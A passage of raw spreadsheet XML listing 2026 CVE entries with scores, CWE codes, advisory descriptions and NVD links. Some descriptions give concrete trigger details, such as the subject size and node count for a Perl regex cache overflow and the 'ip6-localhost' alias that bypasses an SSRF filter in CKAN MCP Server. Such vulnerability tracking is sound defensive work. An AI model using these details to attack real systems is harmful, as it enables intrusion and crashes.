          <t>CWE-125, CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L4523" s="5" t="inlineStr">
        <is>
          <t>Perl versions through 5.45.1 have out-of-bounds heap reads and writes during regular expression matching via an undersized superlinear cache in S_regmatch.
The regex engine's superlinear cache holds one bit per subject position for each participating WHILEM node, so the bit count is the subject length plus one times the number of nodes. Nothing checks that product for positive overflow of the signed 32-bit count: a 286331153 byte subject matched against a pattern with 15 participating nodes stores the count as 14, leaving a two byte cache. The cache is then indexed from the real match position and node number, so reads go past the end of the allocation, and on failure CACHEsayNO sets a bit past it.
A caller that matches an attacker controlled subject of this size against a pattern of this shape can crash the process or corrupt heap memory.</t>
        </is>
      </c>
      <c r="M4523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15534</t>
        </is>
      </c>
    </row>
    <row r="4524">
      <c r="A4524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16006</t>
        </is>
      </c>
      <c r="C4524" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4524" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4524" s="5" t="inlineStr"/>
      <c r="F4524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4524" s="5" t="inlineStr"/>
      <c r="H4524" s="5" t="inlineStr"/>
      <c r="I4524" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4524" s="5" t="inlineStr"/>
      <c r="K4524" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4524" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t>
        </is>
      </c>
    </row>
    <row r="4525">
      <c r="A4525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16180</t>
        </is>
      </c>
      <c r="C4525" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4525" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4525" s="5" t="inlineStr"/>
      <c r="F4525" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4525" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4525" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I4525" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4525" s="5" t="inlineStr"/>
      <c r="K4525" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L4525" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 Toolkit could allow an authenticated user to cause a denial-of-service condition due to improper validation of XML entities.</t>
        </is>
      </c>
      <c r="M4525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16180</t>
        </is>
      </c>
    </row>
    <row r="4526">
      <c r="A4526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18023</t>
        </is>
      </c>
      <c r="C4526" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4526" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4526" s="5" t="inlineStr"/>
      <c r="F4526" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4526" s="5" t="inlineStr"/>
      <c r="H4526" s="5" t="inlineStr"/>
      <c r="I4526" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4526" s="5" t="inlineStr"/>
      <c r="K4526" s="5" t="inlineStr">
        <is>
          <t>CWE-226</t>
        </is>
      </c>
      <c r="L4526" s="5" t="inlineStr">
        <is>
          <t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t>
        </is>
      </c>
    </row>
    <row r="4527">
      <c r="A4527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53509</t>
        </is>
      </c>
      <c r="C4527" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4527" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4527" s="5" t="inlineStr"/>
      <c r="F4527" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4527" s="5" t="inlineStr"/>
      <c r="H4527" s="5" t="inlineStr"/>
      <c r="I4527" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J4527" s="5" t="inlineStr"/>
      <c r="K4527" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4527" s="5" t="inlineStr">
        <is>
          <t>CKAN MCP Server is a tool for querying CKAN open data portals. A known vulnerability CVE-2026-33060 indicated tools including ckan_package_search and sparql_query that accept a base_url parameter had the risk of making HTTP requests to arbitrary endpoints without restriction. A fix was applied to filter out ip addresses. However, a method to bypass exists prior to version 0.4.106. CKAN MCP Server validates caller-supplied CKAN server URLs by inspecting only the parsed hostname string before issuing outbound HTTP requests. In `src/utils/http.ts`, hostname aliases such as `ip6-localhost` are not equal to `localhost`, are not dotted IPv4 literals, and are not bracketed IPv6 literals, so they pass the SSRF filter but can resolve to loopback when the server performs the request. A remote MCP caller that can invoke CKAN tools with a `server_url` can therefore make the server connect to local or private addresses and, for CKAN-shaped responses, receive response-derived data. The updated fix in version 0.4.106 replaced the single `hostname === 'localhost'` check with a blocked-hostname `Set` covering `ip6-localhost` and `ip6-loopback`.</t>
        </is>
      </c>
      <c r="M4527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53509</t>
        </is>
      </c>
    </row>
    <row r="4528">
      <c r="A4528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57825</t>
        </is>
      </c>
      <c r="C4528" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4528" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4528" s="5" t="inlineStr"/>
      <c r="F4528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4528" s="5" t="inlineStr"/>
      <c r="H4528" s="5" t="inlineStr"/>
      <c r="I4528" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4528" s="5" t="inlineStr"/>
      <c r="K4528" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L4528" s="5" t="inlineStr">
        <is>
          <t>In the opam package before 2.5.2 for OCaml, the sandbox protection mechanism can be bypassed because symlinks are mishandled during use of .install files.</t>
        </is>
      </c>
      <c r="M4528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57825</t>
        </is>
      </c>
    </row>
    <row r="4529">
      <c r="A4529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63380</t>
        </is>
      </c>
      <c r="C4529" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4529" s="5" t="inlineStr"/>
      <c r="F4529" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4529" s="5" t="inlineStr"/>
      <c r="H4529" s="5" t="inlineStr"/>
      <c r="I4529" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4529" s="5" t="inlineStr"/>
      <c r="K4529" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-476</t>
        </is>
      </c>
      <c r="L4529" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.2.2-alpha, libevent can dereference invalid list pointers in ws.c when evws_new_session enters its error path after evhttp_start_ws_ succeeds but bufferevent_enable_locking_ fails. evws_connection_free sees a non-null http_server and unconditionally calls TAILQ_REMOVE even though the session was never inserted into http_server-&gt;ws_sessions. A local caller able to induce this allocation or locking failure can crash the process. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M4529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63380</t>
        </is>
      </c>
    </row>
    <row r="4530">
      <c r="A4530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64676</t>
        </is>
      </c>
      <c r="C4530" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4530" s="5" t="inlineStr"/>
      <c r="F4530" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4530" s="5" t="inlineStr"/>
      <c r="H4530" s="5" t="inlineStr"/>
      <c r="I4530" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4530" s="5" t="inlineStr"/>
      <c r="K4530" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4530" s="5" t="inlineStr">
        <is>
          <t>Kata Containers is an open source implementation of lightweight Virtual Machines (VMs) that perform like containers. In versions prior to 4.0.0, the kata-agent is vulnerable to an authorization bypass in confidential-guest memory management. In Confidential Containers (CoCo) deployments, the kata-agent enforces an OPA/Rego-based AgentPolicy that must authorize every ttRPC API call, forming the security boundary that prevents an untrusted host from directing the confidential guest. Two ttRPC methods introduced with the mem-agent feature are missing this authorization check, so an untrusted host can invoke them unconditionally regardless of the guest's policy configuration. When mem-agent is enabled (off by default), this lets the host tamper with in-guest memory management by forcing swap, aggressive eviction, or compaction, resulting in attacker-controlled availability and performance degradation of the confidential workload entirely outside the agent-policy boundary. The impact does not include memory disclosure or code execution, and severity is bounded by the precondition that mem-agent must be explicitly enabled. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M4530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64676</t>
        </is>
      </c>
    </row>
    <row r="4531">
      <c r="A4531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67550</t>
        </is>
      </c>
      <c r="C4531" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4531" s="5" t="inlineStr"/>
      <c r="F4531" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4531" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4531" s="5" t="inlineStr"/>
      <c r="I4531" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J4531" s="5" t="inlineStr"/>
      <c r="K4531" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4531" s="5" t="inlineStr">
        <is>
          <t>re2 provides Node.js bindings for Google's RE2 regular expression engine. Prior to 1.25.2, re2 validates lastIndex against the UTF-8 byte length of a subject but uses it as a UTF-16 code-unit offset in exec, test, match, replace, and split, allowing an attacker-influenced lastIndex on a non-ASCII subject to trigger an out-of-bounds heap read and an uncatchable process crash, with limited heap information disclosure in some cases. This issue is fixed in 1.25.2.</t>
        </is>
      </c>
      <c r="M4531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67550</t>
        </is>
      </c>
    </row>
    <row r="4532">
      <c r="A4532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68874</t>
        </is>
      </c>
      <c r="C4532" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4532" s="5" t="inlineStr"/>
      <c r="F4532" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4532" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4532" s="5" t="inlineStr"/>
      <c r="I4532" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4532" s="5" t="inlineStr"/>
      <c r="K4532" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4532" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t>
        </is>
      </c>
    </row>
    <row r="4533">
      <c r="A4533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69317</t>
        </is>
      </c>
      <c r="C4533" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4533" s="5" t="inlineStr"/>
      <c r="F4533" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4533" s="5" t="inlineStr"/>
      <c r="H4533" s="5" t="inlineStr"/>
      <c r="I4533" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4533" s="5" t="inlineStr"/>
      <c r="K4533" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4533" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t>
        </is>
      </c>
    </row>
    <row r="4534">
      <c r="A4534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69349</t>
        </is>
      </c>
      <c r="C4534" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4534" s="5" t="inlineStr"/>
      <c r="F4534" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4534" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4534" s="5" t="inlineStr"/>
      <c r="I4534" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4534" s="5" t="inlineStr"/>
      <c r="K4534" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4534" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t>
        </is>
      </c>
    </row>
    <row r="4535">
      <c r="A4535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69372</t>
        </is>
      </c>
      <c r="C4535" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4535" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4535" s="5" t="inlineStr"/>
      <c r="F4535" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4535" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4535" s="5" t="inlineStr"/>
      <c r="I4535" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4535" s="5" t="inlineStr"/>
      <c r="K4535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4535" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t>
        </is>
      </c>
    </row>
    <row r="4536">
      <c r="A4536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69393</t>
        </is>
      </c>
      <c r="C4536" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4536" s="5" t="inlineStr"/>
      <c r="F4536" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4536" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4536" s="5" t="inlineStr"/>
      <c r="I4536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4536" s="5" t="inlineStr"/>
      <c r="K4536" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4536" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t>
        </is>
      </c>
    </row>
    <row r="4537">
      <c r="A4537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69405</t>
        </is>
      </c>
      <c r="C4537" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4537" s="5" t="inlineStr"/>
      <c r="F4537" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4537" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4537" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I4537" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4537" s="5" t="inlineStr"/>
      <c r="K4537" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L4537" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M4537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t>
        </is>
      </c>
    </row>
    <row r="4538">
      <c r="A4538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69416</t>
        </is>
      </c>
      <c r="C4538" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4538" s="5" t="inlineStr"/>
      <c r="F4538" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4538" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4538" s="5" t="inlineStr"/>
      <c r="I4538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4538" s="5" t="inlineStr"/>
      <c r="K4538" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4538" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M4538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t>
        </is>
      </c>
    </row>
    <row r="4539">
      <c r="A4539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69507</t>
        </is>
      </c>
      <c r="C4539" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4539" s="5" t="inlineStr"/>
      <c r="F4539" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G4539" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4539" s="5" t="inlineStr"/>
      <c r="I4539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4539" s="5" t="inlineStr"/>
      <c r="K4539" s="5" t="inlineStr">
        <is>
          <t>CWE-538</t>
        </is>
      </c>
      <c r="L4539" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t>
        </is>
      </c>
    </row>
    <row r="4540">
      <c r="A4540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69552</t>
        </is>
      </c>
      <c r="C4540" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4540" s="5" t="inlineStr"/>
      <c r="F4540" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4540" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4540" s="5" t="inlineStr"/>
      <c r="I4540" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4540" s="5" t="inlineStr"/>
      <c r="K4540" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L4540" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t>
        </is>
      </c>
    </row>
    <row r="4541">
      <c r="A4541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69569</t>
        </is>
      </c>
      <c r="C4541" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4541" s="5" t="inlineStr"/>
      <c r="F4541" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4541" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4541" s="5" t="inlineStr"/>
      <c r="I4541" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4541" s="5" t="inlineStr"/>
      <c r="K4541" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L4541" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t>
        </is>
      </c>
    </row>
    <row r="4542">
      <c r="A4542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69572</t>
        </is>
      </c>
      <c r="C4542" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4542" s="5" t="inlineStr"/>
      <c r="F4542" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4542" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4542" s="5" t="inlineStr"/>
      <c r="I4542" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4542" s="5" t="inlineStr"/>
      <c r="K4542" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4542" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t>
        </is>
      </c>
    </row>
    <row r="4543">
      <c r="A4543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69591</t>
        </is>
      </c>
      <c r="C4543" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4543" s="5" t="inlineStr"/>
      <c r="F4543" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G4543" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4543" s="5" t="inlineStr"/>
      <c r="I4543" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4543" s="5" t="inlineStr"/>
      <c r="K4543" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4543" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t>
        </is>
      </c>
    </row>
    <row r="4544">
      <c r="A4544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69637</t>
        </is>
      </c>
      <c r="C4544" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4544" s="5" t="inlineStr"/>
      <c r="F4544" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4544" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4544" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I4544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4544" s="5" t="inlineStr"/>
      <c r="K4544" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L4544" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="M4544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t>
        </is>
      </c>
    </row>
    <row r="4545">
      <c r="A4545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
